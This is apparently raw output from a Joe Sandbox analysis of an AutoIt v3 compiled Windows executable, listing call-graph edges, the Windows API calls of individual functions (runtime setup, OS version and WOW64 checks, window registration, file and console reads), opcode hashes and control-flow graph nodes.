99350->99347 99350->99349 99351 1013547 LoadLibraryExW 99350->99351 99351->99350 99353 1013591 try_get_function 5 API calls 99352->99353 99354 101361a 99353->99354 99355 1013633 TlsAlloc 99354->99355 99356 101341e 99354->99356 99356->99326 99357 10136b1 6 API calls try_get_function 99356->99357 99357->99328 99358->99326 99362 102d213 99359->99362 99363 102d20f 99359->99363 99360 1010a8c CatchGuardHandler 5 API calls 99361 100fed8 99360->99361 99361->99282 99361->99316 99362->99363 99365 1024bfb 99362->99365 99363->99360 99366 1024c07 ___scrt_is_nonwritable_in_current_image 99365->99366 99377 1022f5e EnterCriticalSection 99366->99377 99368 1024c0e 99378 10250af 99368->99378 99370 1024c1d 99371 1024c2c 99370->99371 99391 1024a8f 29 API calls 99370->99391 99393 1024c48 LeaveCriticalSection _abort 99371->99393 99374 1024c27 99392 1024b45 GetStdHandle GetFileType 99374->99392 99375 1024c3d __wsopen_s 99375->99362 99377->99368 99379 10250bb ___scrt_is_nonwritable_in_current_image 99378->99379 99380 10250c8 99379->99380 99381 10250df 99379->99381 99395 101f2d9 20 API calls _abort 99380->99395 99394 1022f5e EnterCriticalSection 99381->99394 99384 10250cd 99396 10227ec 26 API calls pre_c_initialization 99384->99396 99386 10250d7 __wsopen_s 99386->99370 99387 1025117 99397 102513e LeaveCriticalSection _abort 99387->99397 99388 10250eb 99388->99387 99390 1025000 __wsopen_s 21 API calls 99388->99390 99390->99388 99391->99374 99392->99371 99393->99375 99394->99388 99395->99384 99396->99386 99397->99386 99398->99294 99399 ff1044 99404 ff10f3 99399->99404 99401 ff104a 99440 10100a3 29 API calls __onexit 99401->99440 99403 ff1054 99441 ff1398 99404->99441 99408 ff116a 99409 ffa961 22 API calls 99408->99409 99410 ff1174 99409->99410 99411 ffa961 22 API calls 99410->99411 99412 ff117e 99411->99412 99413 ffa961 22 API calls 99412->99413 99414 ff1188 99413->99414 99415 ffa961 22 API calls 99414->99415 99416 ff11c6 99415->99416 99417 ffa961 22 API calls 99416->99417 99418 ff1292 99417->99418 99451 ff171c 99418->99451 99422 ff12c4 99423 ffa961 22 API calls 99422->99423 99424 ff12ce 99423->99424 99425 1001940 9 API calls 99424->99425 99426 ff12f9 99425->99426 99472 ff1aab 99426->99472 99428 ff1315 99429 ff1325 GetStdHandle 99428->99429 99430 ff137a 99429->99430 99431 1032485 99429->99431 99434 ff1387 OleInitialize 99430->99434 99431->99430 99432 103248e 99431->99432 99433 100fddb 22 API calls 99432->99433 99435 1032495 99433->99435 99434->99401 99479 106011d InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 99435->99479 99437 103249e 99480 1060944 CreateThread 99437->99480 99439 10324aa CloseHandle 99439->99430 99440->99403 99481 ff13f1 99441->99481 99444 ff13f1 22 API calls 99445 ff13d0 99444->99445 99446 ffa961 22 API calls 99445->99446 99447 ff13dc 99446->99447 99448 ff6b57 22 API calls 99447->99448 99449 ff1129 99448->99449 99450 ff1bc3 6 API calls 99449->99450 99450->99408 99452 ffa961 22 API calls 99451->99452 99453 ff172c 99452->99453 99454 ffa961 22 API calls 99453->99454 99455 ff1734 99454->99455 99456 ffa961 22 API calls 99455->99456 99457 ff174f 99456->99457 99458 100fddb 22 API calls 99457->99458 99459 ff129c 99458->99459 99460 ff1b4a 99459->99460 99461 ff1b58 99460->99461 99462 ffa961 22 API calls 99461->99462 99463 ff1b63 99462->99463 99464 ffa961 22 API calls 99463->99464 99465 ff1b6e 99464->99465 99466 ffa961 22 API calls 99465->99466 99467 ff1b79 99466->99467 99468 ffa961 22 API calls 99467->99468 99469 ff1b84 99468->99469 99470 100fddb 22 API calls 99469->99470 99471 ff1b96 RegisterWindowMessageW 99470->99471 99471->99422 99473 ff1abb 99472->99473 99474 103272d 99472->99474 99476 100fddb 22 API calls 99473->99476 99488 1063209 23 API calls 99474->99488 99478 ff1ac3 99476->99478 99477 1032738 99478->99428 99479->99437 99480->99439 99489 106092a 28 API calls 99480->99489 99482 ffa961 22 API calls 99481->99482 99483 ff13fc 99482->99483 99484 ffa961 22 API calls 99483->99484 99485 ff1404 99484->99485 99486 ffa961 22 API calls 99485->99486 99487 ff13c6 99486->99487 99487->99444 99488->99477 99490 ff2de3 99491 ff2df0 __wsopen_s 99490->99491 99492 ff2e09 99491->99492 99493 1032c2b ___scrt_fastfail 99491->99493 99494 ff3aa2 23 API calls 99492->99494 99495 1032c47 GetOpenFileNameW 99493->99495 99496 ff2e12 99494->99496 99498 1032c96 99495->99498 99506 ff2da5 99496->99506 99500 ff6b57 22 API calls 99498->99500 99502 1032cab 99500->99502 99502->99502 99503 ff2e27 99524 ff44a8 99503->99524 99507 1031f50 __wsopen_s 99506->99507 99508 ff2db2 GetLongPathNameW 99507->99508 99509 ff6b57 22 API calls 99508->99509 99510 ff2dda 99509->99510 99511 ff3598 99510->99511 99512 ffa961 22 API calls 99511->99512 99513 ff35aa 99512->99513 99514 ff3aa2 23 API calls 99513->99514 99515 ff35b5 99514->99515 99516 10332eb 99515->99516 99517 ff35c0 99515->99517 99522 103330d 99516->99522 99559 100ce60 41 API calls 99516->99559 99518 ff515f 22 API calls 99517->99518 99520 ff35cc 99518->99520 99553 ff35f3 99520->99553 99523 ff35df 99523->99503 99525 ff4ecb 94 API calls 99524->99525 99526 ff44cd 99525->99526 99527 1033833 99526->99527 99528 ff4ecb 94 API calls 99526->99528 99529 1062cf9 80 API calls 99527->99529 99530 ff44e1 99528->99530 99531 1033848 99529->99531 99530->99527 99532 ff44e9 99530->99532 99533 1033869 99531->99533 99534 103384c 99531->99534 99536 1033854 99532->99536 99537 ff44f5 99532->99537 99535 100fe0b 22 API calls 99533->99535 99538 ff4f39 68 API calls 99534->99538 99544 10338ae 99535->99544 99561 105da5a 82 API calls 99536->99561 99560 ff940c 136 API calls 2 library calls 99537->99560 99538->99536 99541 ff2e31 99542 1033862 99542->99533 99543 ff4f39 68 API calls 99547 1033a5f 99543->99547 99544->99547 99550 ff9cb3 22 API calls 99544->99550 99562 105967e 22 API calls __fread_nolock 99544->99562 99563 10595ad 42 API calls _wcslen 99544->99563 99564 1060b5a 22 API calls 99544->99564 99565 ffa4a1 22 API calls __fread_nolock 99544->99565 99566 ff3ff7 22 API calls 99544->99566 99547->99543 99567 105989b 82 API calls __wsopen_s 99547->99567 99550->99544 99554 ff3624 __fread_nolock 99553->99554 99555 ff3605 99553->99555 99556 100fddb 22 API calls 99554->99556 99557 100fe0b 22 API calls 99555->99557 99558 ff363b 99556->99558 99557->99554 99558->99523 99559->99516 99560->99541 99561->99542 99562->99544 99563->99544 99564->99544 99565->99544 99566->99544 99567->99547 99568 102cabc 99569 102cace 99568->99569 99570 102cac5 99568->99570 99572 102c9bb 99570->99572 99592 1022d74 GetLastError 99572->99592 99574 102c9c8 99612 102cada 99574->99612 99576 102c9d0 99621 102c74f 99576->99621 99579 102c9e7 99579->99569 99580 1023820 __fread_nolock 21 API calls 99581 102c9f8 99580->99581 99582 102ca2a 99581->99582 99628 102cb7c 99581->99628 99585 10229c8 _free 20 API calls 99582->99585 99585->99579 99586 102ca25 99638 101f2d9 20 API calls _abort 99586->99638 99588 102ca6e 99588->99582 99639 102c625 26 API calls 99588->99639 99589 102ca42 99589->99588 99590 10229c8 _free 20 API calls 99589->99590 99590->99588 99593 1022d90 99592->99593 99594 1022d8a 99592->99594 99596 1024c7d FindHandlerForForeignException 20 API calls 99593->99596 99598 1022ddf SetLastError 99593->99598 99640 102320e 11 API calls 2 library calls 99594->99640 99597 1022da2 99596->99597 99599 1022daa 99597->99599 99641 1023264 11 API calls 2 library calls 99597->99641 99598->99574 99602 10229c8 _free 20 API calls 99599->99602 99601 1022dbf 99601->99599 99603 1022dc6 99601->99603 99604 1022db0 99602->99604 99642 1022be6 20 API calls FindHandlerForForeignException 99603->99642 99605 1022deb SetLastError 99604->99605 99643 10228a7 38 API calls _abort 99605->99643 99607 1022dd1 99609 10229c8 _free 20 API calls 99607->99609 99611 1022dd8 99609->99611 99611->99598 99611->99605 99613 102cae6 ___scrt_is_nonwritable_in_current_image 99612->99613 99614 1022d74 FindHandlerForForeignException 38 API calls 99613->99614 99616 102caf0 99614->99616 99617 102cb74 __wsopen_s 99616->99617 99620 10229c8 _free 20 API calls 99616->99620 99644 10228a7 38 API calls _abort 99616->99644 99645 1022f5e EnterCriticalSection 99616->99645 99646 102cb6b LeaveCriticalSection _abort 99616->99646 99617->99576 99620->99616 99647 10149a5 99621->99647 99624 102c782 99626 102c787 GetACP 99624->99626 99627 102c799 99624->99627 99625 102c770 GetOEMCP 99625->99627 99626->99627 99627->99579 99627->99580 99629 102c74f 40 API calls 99628->99629 99630 102cb9b 99629->99630 99633 102cbec IsValidCodePage 99630->99633 99635 102cba2 99630->99635 99637 102cc11 ___scrt_fastfail 99630->99637 99631 1010a8c CatchGuardHandler 5 API calls 99632 102ca1d 99631->99632 99632->99586 99632->99589 99634 102cbfe GetCPInfo 99633->99634 99633->99635 99634->99635 99634->99637 99635->99631 99657 102c827 GetCPInfo 99637->99657 99638->99582 99639->99582 99640->99593 99641->99601 99642->99607 99645->99616 99646->99616 99648 10149c2 99647->99648 99654 10149b8 99647->99654 99649 1022d74 FindHandlerForForeignException 38 API calls 99648->99649 99648->99654 99650 10149e3 99649->99650 99655 1022ec3 38 API calls __cftof 99650->99655 99652 10149fc 99656 1022ef0 38 API calls __cftof 99652->99656 99654->99624 99654->99625 99655->99652 99656->99654 99658 102c861 99657->99658 99666 102c90b 99657->99666 99667 102d8c3 99658->99667 99660 1010a8c CatchGuardHandler 5 API calls 99663 102c9b7 99660->99663 99663->99635 99665 102641b 43 API calls 99665->99666 99666->99660 99668 10149a5 __cftof 38 API calls 99667->99668 99669 102d8e3 MultiByteToWideChar 99668->99669 99671 102d921 99669->99671 99672 102d9b9 99669->99672 99674 1023820 __fread_nolock 21 API calls 99671->99674 99677 102d942 _strftime ___scrt_fastfail 99671->99677 99673 1010a8c CatchGuardHandler 5 API calls 99672->99673 99675 102c8c2 99673->99675 99674->99677 99681 102641b 99675->99681 99676 102d9b3 99686 1021537 20 API calls _free 99676->99686 99677->99676 99679 102d987 MultiByteToWideChar 99677->99679 99679->99676 99680 102d9a3 GetStringTypeW 99679->99680 99680->99676 99682 10149a5 __cftof 38 API calls 99681->99682 99683 102642e 99682->99683 99687 10261fe 99683->99687 99686->99672 99688 1026219 99687->99688 99689 102623f MultiByteToWideChar 99688->99689 99690 10263f3 99689->99690 99691 1026269 99689->99691 99692 1010a8c CatchGuardHandler 5 API calls 99690->99692 99694 1023820 __fread_nolock 21 API calls 99691->99694 99696 102628a _strftime 99691->99696 99693 1026406 99692->99693 99693->99665 99694->99696 99695 10262d3 MultiByteToWideChar 99697 10262ec 99695->99697 99709 102633f 99695->99709 99696->99695 99696->99709 99714 1023467 99697->99714 99701 1026316 99704 1023467 _strftime 11 API calls 99701->99704 99701->99709 99702 102634e 99703 102636f _strftime 99702->99703 99706 1023820 __fread_nolock 21 API calls 99702->99706 99705 10263e4 99703->99705 99707 1023467 _strftime 11 API calls 99703->99707 99704->99709 99722 1021537 20 API calls _free 99705->99722 99706->99703 99710 10263c3 99707->99710 99723 1021537 20 API calls _free 99709->99723 99710->99705 99711 10263d2 WideCharToMultiByte 99710->99711 99711->99705 99712 1026412 99711->99712 99724 1021537 20 API calls _free 99712->99724 99715 1022fd7 FindHandlerForForeignException 5 API calls 99714->99715 99716 102348e 99715->99716 99719 1023497 99716->99719 99725 10234ef 10 API calls 3 library calls 99716->99725 99718 10234d7 LCMapStringW 99718->99719 99720 1010a8c CatchGuardHandler 5 API calls 99719->99720 99721 10234e9 99720->99721 99721->99701 99721->99702 99721->99709 99722->99709 99723->99690 99724->99709 99725->99718 99726 1022e7d 99734 1023162 99726->99734 99730 1022e99 99731 1022ea6 99730->99731 99742 1022ea9 11 API calls 99730->99742 99733 1022e91 99735 1022fd7 FindHandlerForForeignException 5 API calls 99734->99735 99736 1023189 99735->99736 99737 10231a1 TlsAlloc 99736->99737 99738 1023192 99736->99738 99737->99738 99739 1010a8c CatchGuardHandler 5 API calls 99738->99739 99740 1022e87 99739->99740 99740->99733 99741 1022df8 20 API calls 2 library calls 99740->99741 99741->99730 99742->99733
                                                APIs
                                                • SetUnhandledExceptionFilter.KERNEL32 ref: 010109DA
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.779610474.0000000000FF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FF0000, based on PE: true
                                                • Associated: 00000008.00000002.779605449.0000000000FF0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779625064.000000000108C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779625064.00000000010B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779636611.00000000010BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779641186.00000000010C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_ff0000_name.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled
                                                • String ID:
                                                • API String ID: 3192549508-0
                                                • Opcode ID: 1f08ca79cf923657f7dc79c13fad37cbf5332c9e7f8fbc38244ffcc9b7cf6182
                                                • Instruction ID: d5ce4158c3120d101a34a87516a4b64cd36d7887c8592b015cbc10973f14bc98
                                                • Opcode Fuzzy Hash: 1f08ca79cf923657f7dc79c13fad37cbf5332c9e7f8fbc38244ffcc9b7cf6182
                                                • Instruction Fuzzy Hash:
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 234 ff42de-ff434d call ffa961 GetVersionExW call ff6b57 239 1033617-103362a 234->239 240 ff4353 234->240 241 103362b-103362f 239->241 242 ff4355-ff4357 240->242 243 1033632-103363e 241->243 244 1033631 241->244 245 ff435d-ff43bc call ff93b2 call ff37a0 242->245 246 1033656 242->246 243->241 247 1033640-1033642 243->247 244->243 260 10337df-10337e6 245->260 261 ff43c2-ff43c4 245->261 250 103365d-1033660 246->250 247->242 249 1033648-103364f 247->249 249->239 252 1033651 249->252 253 ff441b-ff4435 GetCurrentProcess IsWow64Process 250->253 254 1033666-10336a8 250->254 252->246 257 ff4437 253->257 258 ff4494-ff449a 253->258 254->253 259 10336ae-10336b1 254->259 262 ff443d-ff4449 257->262 258->262 263 10336b3-10336bd 259->263 264 10336db-10336e5 259->264 268 1033806-1033809 260->268 269 10337e8 260->269 261->250 267 ff43ca-ff43dd 261->267 272 ff444f-ff445e LoadLibraryA 262->272 273 1033824-1033828 GetSystemInfo 262->273 265 10336ca-10336d6 263->265 266 10336bf-10336c5 263->266 270 10336e7-10336f3 264->270 271 10336f8-1033702 264->271 265->253 266->253 274 1033726-103372f 267->274 275 ff43e3-ff43e5 267->275 279 10337f4-10337fc 268->279 280 103380b-103381a 268->280 276 10337ee 269->276 270->253 277 1033715-1033721 271->277 278 1033704-1033710 271->278 281 ff449c-ff44a6 GetSystemInfo 272->281 282 ff4460-ff446e GetProcAddress 272->282 286 1033731-1033737 274->286 287 103373c-1033748 274->287 284 ff43eb-ff43ee 275->284 285 103374d-1033762 275->285 276->279 277->253 278->253 279->268 280->276 288 103381c-1033822 280->288 283 ff4476-ff4478 281->283 282->281 289 ff4470-ff4474 GetNativeSystemInfo 282->289 294 ff447a-ff447b FreeLibrary 283->294 295 ff4481-ff4493 283->295 290 1033791-1033794 284->290 291 ff43f4-ff440f 284->291 292 1033764-103376a 285->292 293 103376f-103377b 285->293 286->253 287->253 288->279 289->283 290->253 298 103379a-10337c1 290->298 296 1033780-103378c 291->296 297 ff4415 291->297 292->253 293->253 294->295 296->253 297->253 299 10337c3-10337c9 298->299 300 10337ce-10337da 298->300 299->253 300->253
                                                APIs
                                                • GetVersionExW.KERNEL32(?), ref: 00FF430D
                                                  • Part of subcall function 00FF6B57: _wcslen.LIBCMT ref: 00FF6B6A
                                                • GetCurrentProcess.KERNEL32(?,0108CB64,00000000,?,?), ref: 00FF4422
                                                • IsWow64Process.KERNEL32(00000000,?,?), ref: 00FF4429
                                                • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00FF4454
                                                • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo,?,?), ref: 00FF4466
                                                • GetNativeSystemInfo.KERNEL32(?,?,?), ref: 00FF4474
                                                • FreeLibrary.KERNEL32(00000000,?,?), ref: 00FF447B
                                                • GetSystemInfo.KERNEL32(?,?,?), ref: 00FF44A0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.779610474.0000000000FF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FF0000, based on PE: true
                                                • Associated: 00000008.00000002.779605449.0000000000FF0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779625064.000000000108C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779625064.00000000010B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779636611.00000000010BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779641186.00000000010C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_ff0000_name.jbxd
                                                Similarity
                                                • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                                • API String ID: 3290436268-3101561225
                                                • Opcode ID: 6528e6c3760cd4318047af913a33b6e12f3efa25f033f85b17d367ae73d3700f
                                                • Instruction ID: 68f639e7d744eba39da2287f4739778be592d6c954196a16a2c4950fdf8c8206
                                                • Opcode Fuzzy Hash: 6528e6c3760cd4318047af913a33b6e12f3efa25f033f85b17d367ae73d3700f
                                                • Instruction Fuzzy Hash: EEA1C53291E2C4CFC732DB6974902E97FE47F66608B08D999D5C1A7A0BD23E4508EF61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                APIs
                                                • GetSysColorBrush.USER32 ref: 00FF2D07
                                                • RegisterClassExW.USER32(00000030), ref: 00FF2D31
                                                • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00FF2D42
                                                • InitCommonControlsEx.COMCTL32(?), ref: 00FF2D5F
                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00FF2D6F
                                                • LoadIconW.USER32 ref: 00FF2D85
                                                • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00FF2D94
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.779610474.0000000000FF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FF0000, based on PE: true
                                                • Associated: 00000008.00000002.779605449.0000000000FF0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779625064.000000000108C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779625064.00000000010B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779636611.00000000010BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779641186.00000000010C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_ff0000_name.jbxd
                                                Similarity
                                                • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                • API String ID: 2914291525-1005189915
                                                • Opcode ID: c44bd2482dee7884e58ebe1b64d21e51f69b7e9354622fe4520f5b5e198d9129
                                                • Instruction ID: eb3e8d0dfa721c147afb989aeb121487f875591a846369b2972dbdd37efd228d
                                                • Opcode Fuzzy Hash: c44bd2482dee7884e58ebe1b64d21e51f69b7e9354622fe4520f5b5e198d9129
                                                • Instruction Fuzzy Hash: 4D2106B1D05318EFEB20EFA4E949BDDBBB4FB08704F00811AF591A6284D7BA4540CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 302 103065b-103068b call 103042f 305 10306a6-10306b2 call 1025221 302->305 306 103068d-1030698 call 101f2c6 302->306 312 10306b4-10306c9 call 101f2c6 call 101f2d9 305->312 313 10306cb-1030714 call 103039a 305->313 311 103069a-10306a1 call 101f2d9 306->311 323 103097d-1030983 311->323 312->311 321 1030781-103078a GetFileType 313->321 322 1030716-103071f 313->322 327 10307d3-10307d6 321->327 328 103078c-10307bd GetLastError call 101f2a3 CloseHandle 321->328 325 1030721-1030725 322->325 326 1030756-103077c GetLastError call 101f2a3 322->326 325->326 331 1030727-1030754 call 103039a 325->331 326->311 329 10307d8-10307dd 327->329 330 10307df-10307e5 327->330 328->311 339 10307c3-10307ce call 101f2d9 328->339 335 10307e9-1030837 call 102516a 329->335 330->335 336 10307e7 330->336 331->321 331->326 345 1030847-103086b call 103014d 335->345 346 1030839-1030845 call 10305ab 335->346 336->335 339->311 351 103087e-10308c1 345->351 352 103086d 345->352 346->345 353 103086f-1030879 call 10286ae 346->353 355 10308c3-10308c7 351->355 356 10308e2-10308f0 351->356 352->353 353->323 355->356 358 10308c9-10308dd 355->358 359 10308f6-10308fa 356->359 360 103097b 356->360 358->356 359->360 361 10308fc-103092f CloseHandle call 103039a 359->361 360->323 364 1030963-1030977 361->364 365 1030931-103095d GetLastError call 101f2a3 call 1025333 361->365 364->360 365->364
                                                APIs
                                                  • Part of subcall function 0103039A: CreateFileW.KERNELBASE(00000000,00000000,?,01030704,?,?,00000000), ref: 010303B7
                                                • GetLastError.KERNEL32 ref: 0103076F
                                                • __dosmaperr.LIBCMT ref: 01030776
                                                • GetFileType.KERNELBASE ref: 01030782
                                                • GetLastError.KERNEL32 ref: 0103078C
                                                • __dosmaperr.LIBCMT ref: 01030795
                                                • CloseHandle.KERNEL32(00000000), ref: 010307B5
                                                • CloseHandle.KERNEL32(?), ref: 010308FF
                                                • GetLastError.KERNEL32 ref: 01030931
                                                • __dosmaperr.LIBCMT ref: 01030938
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.779610474.0000000000FF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FF0000, based on PE: true
                                                • Associated: 00000008.00000002.779605449.0000000000FF0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779625064.000000000108C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779625064.00000000010B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779636611.00000000010BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779641186.00000000010C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_ff0000_name.jbxd
                                                Similarity
                                                • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                • String ID: H
                                                • API String ID: 4237864984-2852464175
                                                • Opcode ID: d9c0cfd520ea85388d49234d937cd659ec6870de2531488a0a1f530a949c97e9
                                                • Instruction ID: ee83307d01594ee60d0b9c6fb00a171b808363649195d1f56a525f854df03812
                                                • Opcode Fuzzy Hash: d9c0cfd520ea85388d49234d937cd659ec6870de2531488a0a1f530a949c97e9
                                                • Instruction Fuzzy Hash: 1DA13732A041098FDF29AF68D851BEE3BE4AB86320F144199F8919B399C7358903CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                APIs
                                                • GetSysColorBrush.USER32 ref: 00FF2B8E
                                                • LoadCursorW.USER32 ref: 00FF2B9D
                                                • LoadIconW.USER32 ref: 00FF2BB3
                                                • LoadIconW.USER32 ref: 00FF2BC5
                                                • LoadIconW.USER32 ref: 00FF2BD7
                                                • LoadImageW.USER32 ref: 00FF2BEF
                                                • RegisterClassExW.USER32(?), ref: 00FF2C40
                                                  • Part of subcall function 00FF2CD4: GetSysColorBrush.USER32 ref: 00FF2D07
                                                  • Part of subcall function 00FF2CD4: RegisterClassExW.USER32(00000030), ref: 00FF2D31
                                                  • Part of subcall function 00FF2CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00FF2D42
                                                  • Part of subcall function 00FF2CD4: InitCommonControlsEx.COMCTL32(?), ref: 00FF2D5F
                                                  • Part of subcall function 00FF2CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00FF2D6F
                                                  • Part of subcall function 00FF2CD4: LoadIconW.USER32 ref: 00FF2D85
                                                  • Part of subcall function 00FF2CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00FF2D94
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.779610474.0000000000FF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FF0000, based on PE: true
                                                • Associated: 00000008.00000002.779605449.0000000000FF0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779625064.000000000108C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779625064.00000000010B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779636611.00000000010BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779641186.00000000010C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_ff0000_name.jbxd
                                                Similarity
                                                • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                • String ID: #$0$AutoIt v3
                                                • API String ID: 423443420-4155596026
                                                • Opcode ID: 825eb22565fa6714bf2be30d44566bb95d5ab72deb41f5cf2b65b5df6fe33eba
                                                • Instruction ID: ea6904b41b105d8d3e6f501f0d5675665684b941703cdfa321c32f785ed2db43
                                                • Opcode Fuzzy Hash: 825eb22565fa6714bf2be30d44566bb95d5ab72deb41f5cf2b65b5df6fe33eba
                                                • Instruction Fuzzy Hash: 90214C70E00318EFDB209FA5E945AAD7FB5FF48B54F00801AE680A6795D7BA4550DF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 499 1028d45-1028d55 500 1028d57-1028d6a call 101f2c6 call 101f2d9 499->500 501 1028d6f-1028d71 499->501 515 10290f1 500->515 502 1028d77-1028d7d 501->502 503 10290d9-10290e6 call 101f2c6 call 101f2d9 501->503 502->503 506 1028d83-1028dae 502->506 520 10290ec call 10227ec 503->520 506->503 510 1028db4-1028dbd 506->510 513 1028dd7-1028dd9 510->513 514 1028dbf-1028dd2 call 101f2c6 call 101f2d9 510->514 518 10290d5-10290d7 513->518 519 1028ddf-1028de3 513->519 514->520 521 10290f4-10290f9 515->521 518->521 519->518 523 1028de9-1028ded 519->523 520->515 523->514 526 1028def-1028e06 523->526 528 1028e23-1028e2c 526->528 529 1028e08-1028e0b 526->529 532 1028e4a-1028e54 528->532 533 1028e2e-1028e45 call 101f2c6 call 101f2d9 call 10227ec 528->533 530 1028e15-1028e1e 529->530 531 1028e0d-1028e13 529->531 534 1028ebf-1028ed9 530->534 531->530 531->533 536 1028e56-1028e58 532->536 537 1028e5b-1028e79 call 1023820 call 10229c8 * 2 532->537 564 102900c 533->564 539 1028edf-1028eef 534->539 540 1028fad-1028fb6 call 102f89b 534->540 536->537 568 1028e96-1028ebc call 1029424 537->568 569 1028e7b-1028e91 call 101f2d9 call 101f2c6 537->569 539->540 544 1028ef5-1028ef7 539->544 552 1028fb8-1028fca 540->552 553 1029029 540->553 544->540 548 1028efd-1028f23 544->548 548->540 554 1028f29-1028f3c 548->554 552->553 559 1028fcc-1028fdb GetConsoleMode 552->559 557 102902d-1029045 ReadFile 553->557 554->540 555 1028f3e-1028f40 554->555 555->540 560 1028f42-1028f6d 555->560 562 10290a1-10290ac GetLastError 557->562 563 1029047-102904d 557->563 559->553 565 1028fdd-1028fe1 559->565 560->540 567 1028f6f-1028f82 560->567 570 10290c5-10290c8 562->570 571 10290ae-10290c0 call 101f2d9 call 101f2c6 562->571 563->562 572 102904f 563->572 566 102900f-1029019 call 10229c8 564->566 565->557 573 1028fe3-1028ffd ReadConsoleW 565->573 566->521 567->540 575 1028f84-1028f86 567->575 568->534 569->564 582 1029005-102900b call 101f2a3 570->582 583 10290ce-10290d0 570->583 571->564 579 1029052-1029064 572->579 580 102901e-1029027 573->580 581 1028fff GetLastError 573->581 575->540 585 1028f88-1028fa8 575->585 579->566 589 1029066-102906a 579->589 580->579 581->582 582->564 583->566 585->540 593 1029083-102908e 589->593 594 102906c-102907c call 1028a61 589->594 596 1029090 call 1028bb1 593->596 597 102909a-102909f call 10288a1 593->597 606 102907f-1029081 594->606 604 1029095-1029098 596->604 597->604 604->606 606->566
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.779610474.0000000000FF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FF0000, based on PE: true
                                                • Associated: 00000008.00000002.779605449.0000000000FF0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779625064.000000000108C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779625064.00000000010B2000.00000002.00000001.01000000.00000005.sdmpDownload File
